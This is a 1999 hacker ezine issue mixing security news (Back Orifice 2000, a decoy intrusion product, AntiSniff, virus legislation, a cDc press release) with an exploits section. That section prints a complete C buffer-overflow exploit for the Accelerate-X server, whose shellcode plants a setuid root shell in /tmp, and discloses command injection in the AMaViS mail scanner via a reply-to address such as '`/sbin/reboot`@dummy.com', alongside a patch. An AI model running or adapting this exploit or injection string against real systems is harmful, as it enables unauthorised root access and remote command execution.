Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 12
Volume 2 Issue 12
7/22/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lyn 1t.\n";
------------------------------
In this issue of Antidote, we have over 690 subscribers and getting more everyday! The
only thing that we ask of you when you read Antidote, is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor because it is the only thing we ask of you.
-)!-- Contents //--(-
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Authors
0.04 - Shouts
0.05 - Writing
1.00 - News
1.01 - Back Orifice targets Windows NT
1.02 - Rhino9 calls it Quits
1.03 - Accreditation program for IT Labs
1.04 - CyberCop: Industry's first 'Decoy'
1.05 - Hackers Unleash Anti-Sniff Tools
1.06 - Getting tough on Virus-Creators
1.07 - cDc Challenges Microsoft in Recall
2.00 - Exploits (new & older)
2.01 - SDIaccelX.c.txt
2.02 - solaris.rpc.cmsd.bof.txt
2.03 - linux.amvis.root.txt
2.04 - iplogger.ymas.txt
3.00 - Misc
Please submit misc. stuff to antidote@thepoison.org!!!
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plane making fun of something or someone.
FEAT.S - FEATURED SITES:
http://browse.thepoison.org
www.thepoison.org/secsource.html
www.403-security.org
www.hackernews.com
------------------------------
**************************************************
________________________________________________
| ___ ___ __ __ |
| | | |.-----.-----.| |_|__|.-----.-----. |
| | || _ |__ --|| _| || | _ | |
| |___|___||_____|_____||____|__||__|__|___ | |
| http://www.thepoison.org/hosting |_____| |
| |
| Low affordable pricing starting at $10! |
|________________________________________________|
**************************************************
-)!-- 0.00 - Beginning //--(-
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to
teach you how to hack or anything, but we will supply you with the current information
and exploits. Mainly Antidote is just a magazine for people to read if they have some
extra time on there hands and are bored with nothing to do. If you want to read a maga-
zine that teaches you how to hack etc, then you might want to go to your local book-
store and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all e-
mails no matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Authors\\=--
Lord Oak is the founder and current president of Antidote. Most work is done by him.
Please feel free to e-mail him at: lordoak@thepoison.org
Duece is the co-founder and co-president of Antidote, some work is done by him when
he comes online. Feel free to e-mail him at: duece@thepoison.org
ox1dation not really an author, just someone that helps us out a lot and we consider
him as an author! His e-mail address is: ox1dation@thepoison.org
------------------------------
0.04 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece opt1mus
oX1dation PBBSER
Forlorn Retribution
0dnek www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please e-
mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.05 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on
writing something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).
------------------------------
-)!-- 1.00 - News //--(-
1.01 --=\\Back Orifice targets Windows NT\\=--
[www.cnn.com]
(IDG) -- In the consumer world, folks like Ralph Nader fight for consumer rights by
helping pass tough consumer protection laws. Then there's the PC world.
For us, there's a self-proclaimed equivalent: Groups of (mostly teenaged) hackers
basking in the glow of computer monitors, who release nasty computer bugs under the
guise of strong-arming software makers to get tough on privacy and security.
"We want to raise awareness to the vulnerabilities that exist within the Windows oper-
ating system. We believe the best way to do this is by pointing out its weaknesses,"
says a member of the hacker group the Cult of the Dead Cow who goes by the pseudonym
Sir Dystic.
The Cult of the Dead Cow created and released the program Back Orifice last year to the
general public at the Las Vegas hacker and security conference DEF CON. The program
allows its users to remotely control victims' desktops, potentially undetected.
Computer security experts question the Cult of the Dead Cow's intent. Releasing a hack-
ing tool like Back Orifice 2000 in the name of safeguarding computer privacy is a bit
like the American Medical Association infecting cattle with the deadly e. coli bacteria
to inspire food companies to sell healthier meats.
Unlike earlier versions that affected consumers and small businesses, Back Orifice 2000
hits large organizations because it runs on Windows NT systems, which are more used by
businesses. Also, the updated program is modular, so users can add additional func-
tions. For example, they could hide files or activate a computer's microphone for real-
time audio monitoring, according to Cult of the Dead Cow.
Back Orifice 2000 will also be more difficult to detect via network monitoring pro-
grams, according to Sir Dystic. This is because the program can communicate back to the
sender by using a variety of different protocols, making it hard to identify. The group
also says it will make the source code available for Back Orifice 2000, which will
likely spawn multiple strains of the program in the hacker community, experts say.
Another purported function is real-time keystroke-logging, which can record and trans-
mit a record of every keystroke of an infected computer. Also, the recipient can view
the desktop of a targeted computer in real time.
It should be noted that PC World Online has no independent confirmation that new Back
Orifice 2000 program actually lives up to the claims of Cult of the Dead Cow.
http://cnn.com/TECH/computing/9907/07/nthack.idg/index.html
------------------------------
1.02 --=\\Rhino9 calls it Quits\\=--
3 members of Rhino9 have moved to a far off place to accept a position at a security
company with a good future. The rest of Rhino9 just didnt seem to want to continue on
without the other 3 members. We have enjoyed everything we have done as a team and hope
that we have been able to provide the community with some valuable resources.
We want to thank everyone thats supported us over the years. A special thanks to Ken
Williams of PacketStorm for excellent coverage of everything we did. Sorry to hear of
your misfortune bro... JP is an ass. Thanks to L0pht for advice and tidbits of help
over the years. Rhino9 has seen some rough times and some members come and go... but
everyone seems to be doing well.
To the community at large, thanks for everything and I'm sure this wont be the last you
see of R9's members.
Although the team is officially disbanding, its members are still very active.
Thanks Again,
-The Rhino9 Security Research Team
------------------------------
1.03 --=\\Accredutation program for IT Labs\\=--
[www.fcw.com]
The National Institute of Standards and Technology today announced the creation of an
accreditation program for laboratories that test commercial information technology sec-
urity products for compliance with federal and international standards.
The National Voluntary Laboratory Accreditation Program will evaluate laboratories for
their accordance with the National Information Assurance Partnership's Common Criteria
Evaluation and Validation Scheme.
NIST and the National Security Agency created the NIAP and the common criteria scheme
to make it easier for federal agencies to choose commercial IT security products that
meet certain standards. The NIAP Validation Body will review the test reports from the
labs and issue certificates for the products. NIST will periodically assess the labs
for reaccreditation.
NIAP also is working toward a Common Criteria Mutual Recognition Agreement with similar
organizations in five other countries to set a wider-reaching common standard for sec-
urity products.
http://www.fcw.com/pubs/fcw/1999/0712/web-nist-7-12-99.html
------------------------------
1.04 --=\\CyberCop: Industry's first 'Decoy'\\=--
[www.yahoo.com]
Today announced the immediate availability of its CyberCop Sting software, a new ``de-
coy'' server that silently traces and tracks hackers, recording and reporting all in-
trusive activity to security administrators. CyberCop Sting, an industry first, is an
integral component of the CyberCop intrusion protection software family which also
includes CyberCop Monitor, a real-time intrusion detection application that monitors
critical systems and networks for signs of attack (see related release) and CyberCop
Scanner, the industry's most highly-rated network vulnerability scanner. CyberCop Sting addresses the most unfulfilled need in intrusion protection products today by allowing IS managers to silently monitor suspicious activity on their corporate network and identify potential problems before any real data is jeopardized.
CyberCop Sting operates by creating a series of fictitious corporate systems on a
specially outfitted server that combines moderate security protection with sophisti-
cated monitoring technology. The Sting product creates a decoy, virtual TCP/IP network
on a single server or workstation and can simulate a network containing several differ-
ent types of network devices, including Windows NT servers, Unix servers and routers.
Each virtual network device has a real IP address and can receive and send genuine-
looking packets from and to the larger network environment. Each virtual network node
can also run simulated daemons, such as finger and FTP, to further emulate the activity
of a genuine system and avoid suspicion by would-be intruders. While watching all
traffic destined to hosts in its virtual network, Sting performs IP fragmentation
reassembly and TCP stream reassembly on the packets destined to these hosts, convincing
snoopers of the legitimacy of the secret network they've discovered.
``More than 60 percent of all security breaches are caused by authorized employees or
contractors already inside the firewall,'' said Wes Wasson, director of product market-
ing for Network Associates. ``CyberCop Sting gives security administrators, for the
first time ever, a safe way to observe and audit potentially dangerous activity on
their networks before it becomes a problem.''
CyberCop Sting provides a number of benefits for security administrators, including:
* Detection of suspicious activity inside network; Log files serve to
alert administrators to potential attackers prying into reserved areas.
* Ability to record suspicious activity without sacrificing any real
systems or protected information.
* Virtual decoy network can contain multiple "hosts" without the expense
and maintenance that real systems require.
* CyberCop Sting software's virtual hosts return realistic packet
information.
* CyberCop Sting logs snooper activity immediately, so collection of
information about potential attackers can occur before they leave.
* CyberCop Sting requires very little file space but creates a
sophisticated virtual network.
Network Associates' CyberCop Intrusion Protection suite is a collection of integrated
security tools developed to provide network risk assessment scanning (Scanner), real-
time intrusion monitoring (Monitor) and decoy trace-and-track capabilities (Sting) to
enhance the security and survivability of enterprise networks and systems. The suite
is also enhanced by the development of technology and research derived from Network
Associates' extensive product line, and includes industry-first features such as
AutoUpdate, modular construction, and Active Security integration to provide extensive
product integrity. A Network Associates white paper on next-generation intrusion detec-
tion is available at http://www.nai.com/activesecurity/files/ids.doc.
Pricing and availability
CyberCop Sting is free with the purchase of CyberCop Monitor, Network Associates' new
real-time intrusion detection software. Sting is also available as part of the full
CyberCop suite, which also includes CyberCop Scanner, CyberCop Monitor and the CASL
Custom Scripting Toolkit. The CyberCop Intrusion Protection suite is priced at $17 per
seat for a 1,000 user license.
With headquarters in Santa Clara, Calif., Network Associates, Inc. is a leading supp-
lier of enterprise network security and management software. Network Associates' Net
Tools Secure and Net Tools Manager offer best-of-breed, suite-based network security
and management solutions. Net Tools Secure and Net Tools Manager suites combine to cre-
ate Net Tools, which centralizes these point solutions within an easy-to-use, integra-
ted systems management environment. For more information, Network Associates can be
reached at 408-988-3832 or on the Internet at http://www.nai.com .
NOTE: Network Associates, CyberCop, and Net Tools are registered trademarks of Network
Associates and/or its affiliates in the United States and/or other countries. All other
registered and unregistered trademarks in this document are the sole property of their
respective owners.
http://biz.yahoo.com/prnews/990714/ca_ntwrk_a_1.html
------------------------------
1.05 --=\\Hackers Unleash Anti-Sniff Tools\\=--
[www.nytimes.com]
A Boston-based hacker think tank on Friday will unveil software that can detect whether
or not Sniffer-type analyzers are being used to probe enterprise networks.
L0pht Heavy Industries will introduce AntiSniff 1.0 at DefCon, an annual hackers'
convention.
A typical way for hackers -- both black-hat and ethical -- to gain access to an organ-
ization's network is to use analyzers that can sniff or probe for passwords for net-
worked systems.
While many scanning tools can probe networks to expose potential vulnerabilities, they
don't give IT managers a clear sense of whether or not systems have been compromised or
broken into, said L0pht's chief scientist, who goes by the name Mudge.
AntiSniff is designed to help IT managers be more proactive in thwarting security
threats, Mudge told a gathering of security managers and experts today at The Black Hat
Briefings.
"Don't play reactive," Mudge said. "There are new ways to look for [new attack] pat-
terns."
L0pht said it plans to release all technical details for AntiSniff to the public .
But the monitoring software carries a doubled-edge sword.
While it can be used by "good guys" to thwart network intruders, it can also be used by
the "bad guys" to sniff out a company's network intrusion systems, Mudge said.
http://www.nytimes.com/techweb/TW_Hacker_Think_Tank_To_Unleash_Anti_Sniff_Tools.html
------------------------------
1.06 --=\\Getting tough on Virus-Creators\\=--
[www.edmontonjournal.com]
Ottawa has to get tougher with hackers who send file-destroying computer viruses over
the Internet, the industry association representing Canada's computer industry said
Thursday.
The mischievous makers who devise programs that destroy corporate computer files and
cause entire high-tech systems to collapse are getting away with a slap on the wrist
for a crime that is costing the Canadian economy millions annually, said Andre Gauth-
ier, chair of the Information Technology Association of Canada and senior vice-presi-
dent of LGS Group Inc.
"Too many people consider these things as funny. But sending a virus is just like laun-
ching a terrorist attack on a company," Gauthier said.
ITAC, which represents 1,300 Canadian software and hardware companies, sent a letter
Thursday to federal Justice Minister Anne McLellan asking her to increase the penalties
for this kind of crime and to work more closely with other law enforcement agencies
globally to track down virus makers.
Over the past several months, the Chernobyl, Melissa and Worm-Explore.Zip viruses made
headlines internationally as they attacked the computer systems of corporations and
government agencies in many countries.
Viruses are programs that enter a computer system through the e-mail or other external
links and then cause havoc in the network, everything from exploding fireworks on a
person's computer screen to the elimination of stored files on the system's hard drive.
In many cases, these hackers are people who enjoy the intellectual challenge of writ-
ing. In other situations, they are only after the publicity these viruses can receive,
causing people to treat these crimes as less dangerous.
"But (in the information age), a crime no longer requires a .45-calibre Magnum. We have
to deal with these things in a far more serious manner. They do a lot of damage," said
Robert Lendvai, vice-president of marketing at OLAP@Home Inc., an Ottawa-based software
programmer.
For instance, one Ottawa public relations firm had to close its doors for one day to
repair the damage from the Melissa virus, he said.
ITAC's Gauthier figured Canadian corporations and governments lose $100 million annual-
ly because of these computer bugs. That figure was extrapolated from the $1-billion US
loss estimated to American corporations derived from an earlier U.S. study.
Companies are getting help in the form of more sophisticated virus detection programs,
now "a basic protection" for any smart firm, said David Lynch, vice-president of sales
and marketing of KyberPASS Corp., an Ottawa-based electronic commerce software maker.
These detection programs generally work by looking for indicators within a corporate
computer system that change for an unexplained reason. In that case, the program will
send a warning that you may have a problem.
"But viruses are always going to be with us," he said.
KyberPASS was hit by three viruses in the past year, two of which entered the system
through the company's e-mail and one when someone in the corporation downloaded an out-
side file, Lynch said.
"It's computer vandalism. Some of it is paint on the walls. And some is like throwing
eggs at the door," he said.
http://www.edmontonjournal.com/technology/stories/990716/2615262.html
------------------------------
1.07 --=\\cDc Challenges Microsoft in Recall\\=--
[www.cultdeadcow.com]
The CULT OF THE DEAD COW (cDc) publicly challenges Microsoft
Corporation to voluntarily recall all copies of its Systems Management Server network
software. In addition, cDc calls for the antivirus industry to respond with signature
scanning for SMS files.
"Hypocrisy" is such an ugly word. So instead, why don't we just chalk this one up to
Do-What-We-Say-Not-What-We-Do?
Microsoft evidently dislikes our new tool so much that they've taken to complaining
about one of its key features. We're talking about Back Orifice 2000, and the feature
in question is its stealth mode.
Microsoft has claimed that BO2K is a malicious tool with no legitimate use. Their pri-
mary evidence is BO2K's stealth feature, which gives you the option to run the server
on the remote machine without it being evident to anybody sitting at that machine.
In fact, here's what they're saying right now on the Microsoft Security Advisor web-
site:
BO2K is a program that, when installed on a Windows computer, allows the computer to be
remotely controlled by another user. Remote control software is not malicious in and of
itself; in fact, legitimate remote control software packages are available for use by
system administrators. What is different about BO2K is that it is intended to be used
for malicious purposes, and includes stealth behavior that has no purpose other than to
make it difficult to detect.
<http://www.microsoft.com/security/bulletins/bo2k.asp>
Now, we concede that on its face, this sounds like a valid criticism. Being able to
operate a remote admin tool without the person at the other end knowing that it's runn-
ing on the machine seems downright devious. (Keep in mind that BO2K's stealth feature
is an OPTION, which is in fact disabled by default.)
Maybe Microsoft is right; perhaps this stealth feature in and of itself is enough to
brand it a hacker tool with no redeeming social value. But then, what are we to make of
Systems Management Server (SMS)?
SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly
identical stealth feature. As a matter of fact, they explain this feature in a Word
document available from the Microsoft website:
Security
Of all the operations that Systems Management Server allows you to do on a client, re-
mote control is possibly the most "dangerous" in terms of security. Once an administra-
tor is remote controlling a client, he has as many rights and access to that machine as
if he were sitting at it. Added to this, there is also the possibility of carrying out
a remote control session without the user at the client being aware of it. Thus, it is
important to understand the different security options available and also to understand
the legal implications of using some of them in certain jurisdictions."
Visible and Audible Indicators
It is possible to configure a remote control from a state where there is never any
visible or audible indication that a remote control session is under way. It has been
made this flexible due to customer demands ranging from one end of this spectrum to the
other. When configuring the options available in the Remote Tools Client Agent proper-
ties, due notice must also be taken of company policy and local laws about what level
of unannounced and unacknowledged intrusion is permitted."
<http://www.microsoft.com/smsmgmt/techdetails/remote.asp>
Notice that? Microsoft's own tool has the same evil capability as BO2K.
Now, Microsoft did not invent surreptitious desktop surveillance; there are other pro-
ducts on the market that perform these functions. Microsoft is just the largest supp-
lier of the technology, as SMS comes bundled with each copy of Back Office.
Why is it that Microsoft can offer a tool having this illegitimate functionality with-
out any moral qualms, but when WE do it, they throw a hissy fit? Well... we have a
hunch.
"Microsoft wants to keep everybody talking about the evil software from us crazy comp-
uter hackers. So they paint BO2K as a dangerous application with no constructive uses,"
says Reid Fleming (cDc). "We beg to differ."
BO2K doesn't exploit any bugs in the Windows operating system that Microsoft is willing
to categorize as such. So in order to convince the public that BO2K is a solely des-
tructive tool, Microsoft is forced to criticize the tool's feature set. Evidently who-
ever dreamed up this press strategy was unaware of Systems Management Server and its
stealth feature.
Of course, there's another possibility. Microsoft sells SMS for cash money. Meanwhile,
BO2K is free. (It's also open source, and better constructed any way you measure it:
size, efficiency, functionality, security.) Maybe this is just another example of
Microsoft's alleged anticompetitiveness?
"BO2K, like SMS, is a powerful software tool. Like any powerful tool, it can be used
either responsibly or irresponsibly," says Count Zero (cDc). "For Microsoft to claim
that BO2K has no legitimate purpose is ridiculous. Their own SMS tool has nearly the
same functionality as BO2K, and Microsoft is happy to let you pay $1,000+ for it."
Regardless of their motivations, Microsoft is selling software which does many of same
things as Back Orifice 2000, including the pernicious ability to run hidden from the
user. And if stealth mode is what makes BO2K a malicious program, then Microsoft's Sys-
tems Management Server is a malicious program too.
Consequently, we challenge Microsoft to recall all copies of the SMS administration
tool, because its featureset contains stealth capability. This feature clearly illus-
trates that their software has no legitimate use. Furthermore, we urge all antivirus
vendors to include signatures for SMS in their scanner utilities.
Back Orifice 2000 is available for download free of charge from <http://www.bo2k.com/>.
http://www.cultdeadcow.com/news/pr19990719.html
------------------------------
-)!-- 2.00 - Exploits //--(-
2.01 --=\\SDIaccelX.c.txt\\=--
/*
* SDI linux exploit for Accelerate-X
* Sekure SDI - Brazilian Information Security Team
* by c0nd0r <condor@sekure.org>
*
* This script will exploit a vulnerability found by KSRT team
* in the Accelerate-X Xserver [<=5.0].
*
* --------------------------------------------------------------------
* The vulnerable buffer was small so we've changed the usual order to:
* [garbage][eip][lots nop][shellcode]
* BTW, I've also changed the code to execute, it will create a setuid
* shell owned by the superuser at /tmp/sh.
* --------------------------------------------------------------------
*
* Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no
* responsability.
*
* Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
* marty (NORDO!), vader, fcon, slide, c_orb and
* specially to my sasazita. Also toxyn.org, pulhas.org,
* superbofh.org (Phibernet rox) and el8.org.
*
* Laughs - lame guys who hacked the senado/planalto.gov.br
* pay some attention to the site: securityfocus.com (good point).
* see you at #uground (irc.brasnet.org)
*/
#include <stdio.h>
/* generic shellcode */
char shellcode[] =
"\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
"\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
"\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff"
"/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";
main ( int argc, char *argv[] ) {
char buf[1024];
int x, y, offset=1000;
long addr;
int joe;
if (argc > 1)
offset = atoi ( argv[1]);
/* return address */
addr = (long) &joe + offset;
buf[0] = ':';
for ( x = 1; x < 53; x++)
buf[x] = 'X';
buf[x++] = (addr & 0x000000ff);
buf[x++] = (addr & 0x0000ff00) >> 8;
buf[x++] = (addr & 0x00ff0000) >> 16;
buf[x++] = (addr & 0xff000000) >> 24;
for ( ; x < 500; x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(shellcode); y++, x++)
buf[x] = shellcode[y];
fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n",
offset, addr);
buf[strlen(buf)] = '\0';
execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
// setenv ( "EGG", buf, 1);
// system ( "/bin/sh");
}
------------------------------
2.02 --=\\solaris.rpc.cmsd.bof.txt\\=--
Subject: Re: Exploit of rpc.cmsd
Date: Sat Jul 10 1999 00:43:08
Author: Andy Polyakov
Bob!
> The calendar manager (rpc.cmsd) on Solaris 2.5 and 2.5.1 is vulnerable
> to a buffer overflow
> attack...
> ... we have seen the
> intruder delete administrator
> logs, change homepages, and insert backdoors. The attack signature is
> similar to the tooltalk attack.
Can you confirm that compromised system(s) were equipped with CDE? Or in
other words was it /usr/dt/bin/rpc.cmsd that was assigned to do the job
in /etc/inetd.conf?
> Further, it appears that even patched versions may be
> vulnerable.
Could you be more specific here and tell exactly which patches are you
talking about?
> Also, rpc.cmsd under
> Solaris 2.6 could also be problematic.
I want to point out that there is a rather fresh 105566-07 for Solaris
2.6 which claims "4230754 Possible buffer overflows in rpc.cmsd" fixed.
There is rather old 103670-03 for Solaris 2.5[.1] which claims "1264389
rpc.cmsd security problem." fixed. Then there is 104976-03 claiming
"1265008 : Solaris 2.x rpc.cmsd vulnerabity" fixed. Are these the ones
you refer to as "patched versions" and "could be problematic"?
Andy.
------------------------------
2.03 --=\\linux.amvis.root.txt\\=--
Subject: AMaViS virus scanner for Linux - root exploit
Date: Fri Jul 16 1999 16:00:43
Author: Chris McDonough <mailto:mcdonc@iqgroup.com>
The AMaViS incoming-mail virus scanning utility (available
at http://satan.oih.rwth-aachen.de/AMaViS/) for Linux has
problems.
I tried to contact the maintainer of the package (Christian
Bricart) on June 26, again several times over the course of
the last month, but I have not received anything from him
and the AMaViS website does not yet acknowledge the problem
or provide a fix. However, on Jun 30, co-contributors to
the package (Juergen Quade and Mogens Kjaer) responded
quickly with an acknowledgement of the problem and a few
fixes. Because the co-authors do not maintain the
downloadable package, however, the latest downloadable
version of AMaViS (0.2.0-pre4 and possibly earlier) still
has a bug which allows remote users to send arbitrary
commands as root to a Linux machine running the AMaViS
scripts.
Exploit:
Send a message with a virus-infected file attachment. Use
something like "`/sbin/reboot`@dummy.com <mailto:>" as your reply-to
address in your MUA when sending the message. When the
AMaViS box receives the message, it will go through its
scripts, find the virus, construct an email message to send
back to the sender of the virus-infected file... line 601+
in the "scanmails" script:
cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $7" $2
V I R U S A L E R T
Our viruschecker found a VIRUS in your email to "$7".
We stopped delivery of this email!
Now it is on you to check your system for viruses
For further information about this viruschecker see:
http://aachalon.de/AMaViS/
AMaViS - A Mail Virus Scanner, licenced GPL
EOF
... the $2 expands to a shell command (e.g. "/sbin/reboot")
which runs as root.
To solve it, Juergen Quade created the following diff
file. It represents the difference between his "secured"
and "insecure" scanmails shell script file. I solved it
differently, using a procmail recipe, but this will work
too:
--- scanmails.orig Wed Jun 30 12:54:02 1999
+++ scanmails Wed Jun 30 12:54:15 1999
@@ -122,6 +122,50 @@
deliver=/usr/bin/procmail
+
############################################################
###
+# Chris McDonough informed us, that it is possible to
execute #
+# programs by sending an email, wich contains a virus and
has #
+# as return address something
like: #
+#
`/sbin/reboot`@softing.com <mailto:`/sbin/reboot`@softing.com> #
+#
or
#
+# $(/sbin/reboot)
@softing.com #
+# The execution of the command (/sbin/reboot) is done by
the #
+# "mail" program. Therefore we parse the arguments in
order #
+# to substitute those characters to
nothing #
+
#
#
+# Wed Jun 30 11:47:55 MEST
1999 #
+
############################################################
###
+
+# substitute all "`","$(",")" to nothing
+receiver=${7//\`/}
+receiver=${receiver//\$\(/}
+receiver=${receiver//\)/}
+
+sender=${2//\`/}
+sender=${sender//\$\(/}
+sender=${sender//\)/}
+
+if [ "$sender" != "$2" -o "$receiver" != "$7" ] ; then
+ cat <<EOF | ${mail} -s "Intrusion???" ${mailto}
+
############################################################
###
+# Chris McDonough informed us, that it is possible to
execute #
+# programs by sending an email, wich contains a virus and
has #
+# as return address something
like: #
+#
\`/sbin/rebbot\`@softing.com <mailto:\`/sbin/rebbot\`@softing.com> #
+#
or
#
+# \$\(/sbin/rebbot\)
@softing.com #
+# The execution of the command (/sbin/rebbot) is done by
the #
+# "mail" program. Therefore we parse the arguments in
order #
+# to substitute those characters to
nothing #
+
#
#
+# Wed Jun 30 11:47:55 MEST
1999 #
+
############################################################
###
+ $7 or $2 is not a valid Email address
+ (changed to $receiver and $sender)!
+EOF
+fi
+#
+
################################################
# main program #
# -------------- #
@@ -171,8 +215,8 @@
echo xxxxxxxxxxxxxxxxxx`date`xxxxxxxxxxxxxxxxxxxxxxx >
${tmpdir}/logfile
echo ${scanscriptname} called $* >>${tmpdir}/logfile
-echo FROM: $2 >>/${tmpdir}/logfile
-echo TO: $7 >>/${tmpdir}/logfile
+echo FROM: $sender >>/${tmpdir}/logfile
+echo TO: $receiver >>/${tmpdir}/logfile
${metamail} -r -q -x -w ${tmpdir}/receivedmail > /dev/null
2>&1
@@ -597,11 +641,11 @@
################### send a mail back to sender
######################
-cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $7" $2
+cat <<EOF| ${mail} -s "VIRUS IN YOUR MAIL TO $receiver"
$sender
V I R U S A L E R T
- Our viruschecker found a VIRUS in your email to "$7".
+ Our viruschecker found a VIRUS in your email to
"$receiver".
We stopped delivery of this email!
Now it is on you to check your system for
viruses
@@ -614,12 +658,12 @@
############### send a mail to the addressee
########################
-cat <<EOF| ${mail} -s "VIRUS IN A MAIL FOR YOU FROM $2" $7
+cat <<EOF| ${mail} -s "VIRUS IN A MAIL FOR YOU FROM
$sender" $receiver
V I R U S A L E R T
Our viruschecker found a VIRUS in a mail from
- "$2"
+ "$sender"
to you.
Delivery of the email was stopped!
------------------------------
2.04 --=\\iplogger.ymas.txt\\=--
Subject: iplogger Ymas problem
Date: Mon Jul 19 1999 06:13:15
Author: Salvatore Sanfilippo -antirez- <mailto:antirez@speedcom.it>
Re,
tcplog is part of iplogger-1.2.
from tcplog.c
#ifdef DETECT_BOGUS
/* Nmap and Queso use a bogus tcp flag to "fingerprint" OS'es.. */
if ((hdr.tcp.th_flags & TH_BOG) && last_bogus != hdr.ip.ip_src.s_addr) {
last_bogus = hdr.ip.ip_src.s_addr;
syslog(LEVEL, "bogus tcp flags set by %s (%s)", hostlookup(hdr.ip.ip_src.s_addr, (syncount != SYN_FLOOD)), inet_ntoa(hdr.ip.ip_src));
}
#endif
but this isn't enought. Ymas (0x80) bogus flag
must be logged.
try hping -Y to test if your port scanning
detector have the same problem.
poblem noticed with ntf <emanuele@secnet.dyndns.org <mailto:emanuele@secnet.dyndns.org>>.
Here is the patch (but i think it's better to rewrite)
--- tcplog.c Mon Jul 19 05:32:58 1999
+++ tcplog-new.c Mon Jul 19 05:46:48 1999
@@ -59,6 +59,7 @@
#ifdef DETECT_BOGUS
# define TH_BOGUS 0x40
+# define TH_OTHER_BOG 0x80
# define TH_BOG TH_BOGUS
#endif
@@ -133,7 +134,7 @@
#ifdef DETECT_BOGUS
/* Nmap and Queso use a bogus tcp flag to "fingerprint" OS'es.. */
- if ((hdr.tcp.th_flags & TH_BOG) && last_bogus != hdr.ip.ip_src.s_addr) {
+ if ((((hdr.tcp.th_flags & TH_BOG) || (hdr.tcp.th_flags & TH_OTHER_BOG))) && last_bogus != hdr.ip.ip_src.s_addr) {
last_bogus = hdr.ip.ip_src.s_addr;
